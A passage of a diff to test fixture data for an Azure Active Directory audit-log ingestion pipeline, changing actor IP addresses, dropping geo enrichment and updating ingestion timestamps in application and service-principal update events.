{\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4086,25 +3726,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4118,7 +3740,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4241,7 +3863,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4253,12 +3875,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036187400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124949900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4284,25 +3906,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4316,7 +3920,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4430,7 +4034,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4442,12 +4046,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036200600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124955100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 